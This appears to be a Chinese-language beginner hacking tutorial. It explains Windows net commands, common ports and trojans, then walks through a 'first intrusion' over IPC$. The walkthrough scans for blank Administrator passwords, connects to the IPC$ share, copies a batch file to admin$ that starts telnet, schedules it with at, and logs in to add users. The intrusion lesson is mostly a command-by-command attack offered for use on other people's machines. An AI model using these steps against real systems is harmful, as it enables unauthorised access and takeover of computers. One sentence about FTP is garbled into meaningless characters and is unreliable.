1、 NET ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP | HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION | SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW 上面就是 net 命令 .你可以在 cmd 下键入 net/?获得.我们看看一些常用的 . net user 列举所有用户 例子:c:net user net localgroup 把用户分组 例子 :c:net
2、localgroup administrators guest /add 把 guest 用户加到管理组.需要有足够的权限才能进行操作! net share 显示共享资源 例子:c:net share net start 启动服务,或显示已启动服务的列表 例子:net start 例子 :net start telnet 启动 telnet net stop 停止 Windows2000 网络服务 例子 c:net stop telnet 停止 telnet 服务 net time 显示时间 例子:c:net time 127.0.0.1 显示 127.0.0.1 的时间 net use 显示
3、关于计算机连接的信息 例子:c:net use net view 显示域列表、计算机列表或者由指定计算机共享的资源 例子:c:net view net 的基本命令就到此结束吧! 但并不是说其它的命令不用去学!只是我的基本教学( 入侵)课程需要用的命令是这些而已自己去 windows 帮助那里看看吧!DOS 下的基本命令是很重要的! 如:copy 等.还有 ftp 等等重要的命令因为种种原因请各位自行去看.(基本课程不能太复杂的,OK?!)好了下课 第二节课:端口和木马 A.第二节课了这节课我们首先来学习一下端口吧!什么是端口?就是计算机和外界连接的通道!例如我们看网页用的实际上是 80 端口.
4、 1)、telnet 登录的端口 (23/tcp) 这个信息表明远程登录服务正在运行,在这里你可以远程登录到该主机. 2)、WWW(80/TCP)端口 它表明 WWW 服务在该端口运行 别告诉我你不知道 WWW 服务是什么哦,也就是说,如果有网站的服务器都有 80 端口。 3)、FTP(21/tcp) ftp 服务和 TELNET 服务一样,你还可以从 FTP 服务器上获得或上传柿夏韭淼龋 械幕故悄涿 锹降模还 庋 暮檬潞孟癫欢唷?4)、finger (79/tcp) 端口 finger 服务对入侵者来说是一个非常有用的信息,从它可以获得用户信息,查看机器的运行情况等。 5)、远程控制(338
5、9) 这个端口用于远程登陆. 还有一些常见的端口例如 110,135,139,25 等等等.我们这次基础教程需要用到的是 23 端口.其它的因为觉得重要所以也列举了出来.剩下的请自己去补补.(不是我不负责任.是课程的问题! 请谅解!)PS:并不是所有的端口都是有用的. B.木马 讲个故事给大家听吧!-传说希腊人围攻特洛伊城,久久不能得手。后来想出了一个木马计,让士兵藏匿于巨大的木马中。大部队假装撤退而将木马摈弃于特洛伊城下,让敌人将其作为战利品拖入城内。木马内的士兵则乘夜晚敌人庆祝胜利、放松警惕的时候从木马中爬出来,与城外的部队里应外合而攻下了特洛伊城。 木马的危害性是很大的!例如冰河等木马甚
6、至可以远程控制你的电脑! 同时木马也会打开一些端口.你也可以借查看端口来看看有没木马在你的电脑上运行.不过有的木马是利用已有的端口的.这个就比较麻烦了.需要用杀毒软件帮忙了 我们的课程并不需要使用到木马.只是本人认为各位值得一学第三节课:ipc 入侵 . 好了估计你们看了那么多基础的东西已经很不耐烦了这节课就来实行你的第一次入侵吧!咳咳放下你的 AK-47,我们不需要那个家伙 A.什么是 ipc? IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用.利用 IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我
7、们就可以得到目标主机上的用户列表。用“流光” 的 IPC$探测功能,就可以得到用户列表了,并可以配合字典,进行密码尝试。 B.OK!运用你在上两节课学到的知识跟我冲吧!掌握好你的命令使用了吗? 需要用的的扫描软件:xscan 操作系统:win2000(不要告诉我你那还是 98 或者 me,我马上 K 了你!) 首先我们使用扫描器扫描一个 IP 段.打开 xscan,选择“设置“,再选“扫描模块“,然后只选 nt 弱口令的那项.确定后选“设置“,“扫描参数“然后填入 IP 段.就 127.0.0.1-127.0.0.255 吧!(注意:IP 段纯属虚构.) 假设我们已经扫到一个了.127.0.0
8、.2 用户名:Administrator 密码 :空(唉真搞不清现在的人为什么这么没安全意识.) 打开 cmd,输入:net use 127.0.0.1ipc$ “ /user:“Administrator“ 命令成功完成.OK!下一步 at 127.0.0.1 这步纯属个人习惯.因为我想知道他开了 AT 没有.没开就放弃吧 接下来我们需要编辑一个批处理文件.打开记事本,输入如下内容:net start telnet 然后保存为a.bat 注意扩展名!是 bat! 编辑好后就继续吧! copy a.bat 127.0.0.1admin$ admin$就是放在目标 winnt 的根目录下 net
9、 time 127.0.0.1 看看目标的时间吧!有用的 假设是晚上 9 点.接着下一步吧! at 127.0.0.1 20:01 a.bat 用 AT 命令让目标运行 a.bat.注意时间要 24 小时制的! net time 127.0.0.1 看看到时间没? 假设到了,我们就实行下一步吧! telnet 127.0.0.1 登陆到对方的机子上.刚才的那个批处理就是用来打开它的 23 端口的 接着输入用户名和密码 就是用户 Administrator 啊!密码是空的.回车就行了 OK!一切成功 !现在你可以做你想做的事了例如添加用户等等(就是命令的使用啊! 所以说命令重要!) 好了现在你们应该可以去实行自己的第一次入侵了当然实际操作中并不全像上面的那么容易.会出现很多问题的.例如 at 不能执行 .telnet 上去时需要验证等等 .这就留待你们自己去解决了
